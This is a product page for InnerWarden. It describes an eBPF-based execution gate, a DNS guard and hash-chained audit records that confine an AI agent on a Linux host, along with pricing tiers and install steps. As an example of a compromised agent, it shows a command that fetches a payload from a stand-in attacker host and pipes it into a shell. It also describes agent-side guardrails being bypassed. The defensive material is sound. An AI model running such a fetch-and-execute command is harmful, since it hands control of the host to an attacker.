Risk surfaced
The tool chain is classified before it reaches the host.
signal · network + shell chainPrompt guards live inside the conversation the attacker controls. Enterprise puts the decision below it: on a supported Linux kernel, the Execution Gate denies unauthorized binaries at exec, and the evidence survives.
Switch between expected work and a compromised-agent path, and follow the same tool call through guard, gate, and evidence.
curl attacker.tld/payload | shThe tool chain is classified before it reaches the host.
signal · network + shell chainPro and Enterprise enforce outside the compromised agent process.
EPERM · eBPF LSM gateAttempt, decision, and enforcing control form one record.
block hash · f2b7…1d09The agent-side context is compromised. The execution boundary is not: Linux denies the payload before it starts, then preserves the block as evidence.
Guardrails inside the agent reduce risk before an action. Enterprise assumes they can be bypassed, and keeps the last decision at the host.
On supported Linux kernels, an agent-scoped eBPF LSM gate refuses a program whose path is not on the allowlist before it starts. It decides which programs start, not what an allowed one does: an allowlisted shell or interpreter still runs the script it is handed. Host workloads outside that boundary continue normally.
bprm_check_security · scoped cgroup · hard EPERMSecret Read Guard protects declared sensitive paths. DNS Guard is a forwarding resolver that refuses to resolve malicious domains. It runs in observe by default. The operator arms enforce; we recommend a rehearse first, and arming does not require one. No host we run has DNS Guard in enforce today: on our public challenge box it is set to observe, and only the challenge agent is pointed at it.
file_open LSM · DNS denylist resolver · local decisions82 host detectors and 68 cross-layer correlation rules connect agent intent to process, file, identity, and network behavior.
eBPF telemetry · verified outcomes · autonomous responseLocal decision history, host and tenant attribution, correction records, and signed off-host anchors create evidence for incident response and security review.
append-only records · hash chain · signed anchorOpen-source eBPF LSM tools exist, and a hook at exec is not the product. What InnerWarden adds is what sits around that hook for an AI agent, and each part below is something you can check.
An allowlist of the program paths one AI agent may run, checked at exec and scoped to that agent's cgroup, so the rest of the host is untouched. It decides which programs start, not what an allowed one does: an allowlisted shell or interpreter still runs the script it is handed.
It installs disarmed, and you arm it in observe first, which blocks nothing. Enforce is refused host-wide, refused while a boot-essential program is missing from the allowlist, and refused where the kernel cannot run the gate. The enforce command also waits for an observe window in which the agent ran nothing unlisted; the lower-level arm command skips that window. Disarming is one command and needs no licence.
Every paid host binary ships with an Ed25519 signature that the installer checks against a key it pins, and refuses to install on a mismatch. The security pack gives the commands to check a binary yourself.
Every decision and every response goes into a hash-chained audit trail on the host: change or delete an old record and the chain breaks from that point.
The sensor detects, the agent decides and applies the response, and the record stays on the host, with no cloud control plane. Triage can call a cloud model you configure (bring your own key, off by default), and our public challenge box uses one.
Each is good at what it is built for, and each can run next to InnerWarden. What each is built for:
InnerWarden is built around one AI agent instead: its allowlist is scoped to that agent, arming refuses a host-wide enforce and a missing boot essential, the free guardrail screens the agent's commands and tool calls before they run, and the record of what it tried stays on the host.
Configuration is not protection. The live control must be compatible, scoped, armed, and verified before the dashboard is allowed to claim enforcement, so production is never the policy test.
Establish the agent, host, and workload boundary without changing execution.
Measure exactly what would be denied and resolve legitimate paths before cutover.
Arm only on a compatible Linux host after a clean rehearsal and explicit operator approval.
Compare configured state with the live kernel and retain the resulting evidence.
The paid stack installs on a Linux server and comes up in observe mode: it watches the machine and explains what it sees, and blocks nothing until you decide it should.
curl -fsSL https://innerwarden.com/install | sudo bash -s -- --license=/path/to/license.keyInstalls the eBPF sensor, the host detectors, cross-layer correlation, autonomous response, and the paid capabilities (Execution Gate, DNS Guard, anti-tamper watchdog). Linux only: eBPF needs a recent kernel and root. Prefer to read it first? Download the script, review it, then run it. Flags: ... | sudo bash -s -- --help
Pro is bought online, per protected agent; Enterprise is scoped per deployment. Both install this same stack. Compare the tiers, or start a scoped pilot.
Run the command above on the host, passing the license key we sent you. The license is what selects the paid tier, so it goes in the install command rather than after it. It stays in observe: nothing is blocked yet.
Follow the rollout above. The dashboard only claims enforcement once the live control is compatible, scoped, armed, and verified.
Full steps, verification, and the unattended flags are in the install documentation. Already running the free guardrail? It keeps working: the paid tier adds the host layer underneath it.
Community is deliberately useful on its own. The paid tiers are not a feature unlock dressed as security: Pro adds the host-enforced boundary that is verified before it claims enforcement, and Enterprise runs it across a fleet.
Cross-platform command and MCP screening, agent discovery, AI Jail sandboxing on platforms that support it, local decisions, dashboard, token intelligence, and alerts.
The Linux host sensor, eBPF visibility, agent-scoped kernel controls and autonomous response. See the pricing page for the full breakdown.
The same stack across many hosts under one agreement, fleet operations across them, and the services: curated policy, a quarterly assurance audit, SLA and support.
In-path MCP proxy controls and the armed host or kernel boundary. Advisory checks alone remain bypassable if a hostile agent refuses to call them.
A supported Linux kernel with BPF LSM active, a verified live gate, an explicit scope, and a completed observe-and-rehearse workflow.
We scope one agent, one threat model, one Linux deployment, and measurable pass/fail criteria. You finish with a tested control boundary and evidence your security team can review.
Not ready for a production pilot? Install free and start building the agent decision history today.